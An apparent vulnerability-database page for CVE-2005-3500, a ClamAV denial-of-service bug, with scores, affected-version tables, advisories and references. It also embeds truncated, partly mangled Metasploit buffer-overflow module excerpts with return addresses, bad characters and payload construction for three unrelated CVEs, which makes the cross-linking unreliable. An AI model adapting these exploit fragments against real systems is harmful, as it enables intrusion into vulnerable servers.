CVE-2005-3500
published 2005-11-05CVE-2005-3500: The tnef_attachment function in tnef.c for Clam AntiVirus (ClamAV) before 0.87.1 allows remote attackers to cause a denial of service (infinite loop and memory…
PriorityP417medium5CVSS 2.0
AVNACLAuNCNINAP
EPSS
3.96%
89.1th percentile
The tnef_attachment function in tnef.c for Clam AntiVirus (ClamAV) before 0.87.1 allows remote attackers to cause a denial of service (infinite loop and memory exhaustion) via a crafted value in a CAB file that causes ClamAV to repeatedly scan the same block.
Affected
38 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
| clam_anti-virus | clamav | — | — |
CVSS provenance
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:N/I:N/A:P
osv5.0MEDIUM
vendor_debian5.0MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-r3fq-7p2f-f5f3: The tnef_attachment function in tnef
ghsa_unreviewed·2022-05-01
CVE-2005-3500 [MEDIUM] GHSA-r3fq-7p2f-f5f3: The tnef_attachment function in tnef
The tnef_attachment function in tnef.c for Clam AntiVirus (ClamAV) before 0.87.1 allows remote attackers to cause a denial of service (infinite loop and memory exhaustion) via a crafted value in a CAB file that causes ClamAV to repeatedly scan the same block.
OSV
CVE-2005-3500: The tnef_attachment function in tnef
osv·2005-11-05·CVSS 5.0
CVE-2005-3500 [MEDIUM] CVE-2005-3500: The tnef_attachment function in tnef
The tnef_attachment function in tnef.c for Clam AntiVirus (ClamAV) before 0.87.1 allows remote attackers to cause a denial of service (infinite loop and memory exhaustion) via a crafted value in a CAB file that causes ClamAV to repeatedly scan the same block.
Debian
CVE-2005-3500: clamav - The tnef_attachment function in tnef.c for Clam AntiVirus (ClamAV) before 0.87.1...
vendor_debian·2005·CVSS 5.0
CVE-2005-3500 [MEDIUM] CVE-2005-3500: clamav - The tnef_attachment function in tnef.c for Clam AntiVirus (ClamAV) before 0.87.1...
The tnef_attachment function in tnef.c for Clam AntiVirus (ClamAV) before 0.87.1 allows remote attackers to cause a denial of service (infinite loop and memory exhaustion) via a crafted value in a CAB file that causes ClamAV to repeatedly scan the same block.
Scope: local
bookworm: resolved (fixed in 0.87.1-1)
bullseye: resolved (fixed in 0.87.1-1)
forky: resolved (fixed in 0.87.1-1)
sid: resolved (fixed in 0.87.1-1)
trixie: resolved (fixed in 0.87.1-1)
No detection rules found.
Exploit-DB
PCMan FTP Server 2.0.7 - Remote (Metasploit)
exploitdb·2013-07-22
CVE-2013-4730 PCMan FTP Server 2.0.7 - Remote (Metasploit)
PCMan FTP Server 2.0.7 - Remote (Metasploit)
---
# Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 'PCMan\'s FTPD V2.0.7 Username Overflow',
'Description' => %q{
This module exploits a buffer overflow found in the USER command
of PCMan's FTPD.
},
'Author' => 'MSJ ',
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread'
},
'Payload' =>
{
'Space' => 2005,
'BadChars' => "\x53\x93\x42\x7E",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Target 0
[
'Windows XP SP3 En
Exploit-DB
Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2005-4411 Mercury/32 < 4.01b - PH Server Module Buffer Overflow (Metasploit)
Mercury/32 'Mercury/32 %q{
This module exploits a stack-based buffer overflow in
Mercury/32 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9525 $',
'References' =>
[
[ 'CVE', '2005-4411' ],
[ 'OSVDB', '22103'],
[ 'BID', '16396' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 500,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ],
[ 'Windows 2000 Pro English ALL', { 'Ret' => 0x75022ac4 } ],
],
'Privileged' => true,
'DisclosureDate' => 'Dec 19 2005',
'DefaultTarget' => 0))
register_options([ Opt::RPORT(105)], self)
end
def exploit
connect
print_status("Trying target #{target.name}...")
sploit = rand_text_alphanumeric(224, payload_badc
Exploit-DB
Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
exploitdb·2005-04-12
CVE-2005-1099 Salim Gasmi GLD (Greylisting Daemon) 1.0 < 1.4 - Postfix Greylisting Buffer Overflow (Metasploit)
Salim Gasmi GLD (Greylisting Daemon) 1.0 'GLD (Greylisting Daemon) Postfix Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in the Salim Gasmi
GLD '$Revision$',
'Author' => [ 'patrick' ],
'Arch' => ARCH_X86,
'Platform' => 'linux',
'References' =>
[
[ 'CVE', '2005-1099' ],
[ 'OSVDB', '15492' ],
[ 'BID', '13129' ],
[ 'URL', 'http://www.milw0rm.com/exploits/934' ],
],
'Privileged' => true,
'License' => MSF_LICENSE,
'Payload' =>
{
'Space' => 1000,
'BadChars' => "\x00\x0a\x0d\x20=",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'RedHat Linux 7.0 (Guinness)', { 'Ret' => 0xbfffa5d8 } ],
],
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(2525)
],
self.class
)
end
def exploit
connect
sploit = "sender="+ payload.encoded + "\r\n"
sploit << "client_address=" + [
No writeups or analysis indexed.
http://secunia.com/advisories/17184http://secunia.com/advisories/17434http://secunia.com/advisories/17451http://secunia.com/advisories/17501http://secunia.com/advisories/17559http://securityreason.com/securityalert/152http://securitytracker.com/id?1015154http://sourceforge.net/project/shownotes.php?release_id=368319http://www.debian.org/security/2005/dsa-887http://www.gentoo.org/security/en/glsa/glsa-200511-04.xmlhttp://www.idefense.com/application/poi/display?id=333&type=vulnerabilitieshttp://www.mandriva.com/security/advisories?name=MDKSA-2005:205http://www.osvdb.org/20483http://www.securityfocus.com/bid/15316http://www.vupen.com/english/advisories/2005/2294http://secunia.com/advisories/17184http://secunia.com/advisories/17434http://secunia.com/advisories/17451http://secunia.com/advisories/17501http://secunia.com/advisories/17559http://securityreason.com/securityalert/152http://securitytracker.com/id?1015154http://sourceforge.net/project/shownotes.php?release_id=368319http://www.debian.org/security/2005/dsa-887http://www.gentoo.org/security/en/glsa/glsa-200511-04.xmlhttp://www.idefense.com/application/poi/display?id=333&type=vulnerabilitieshttp://www.mandriva.com/security/advisories?name=MDKSA-2005:205http://www.osvdb.org/20483http://www.securityfocus.com/bid/15316http://www.vupen.com/english/advisories/2005/2294
2005-11-05
Published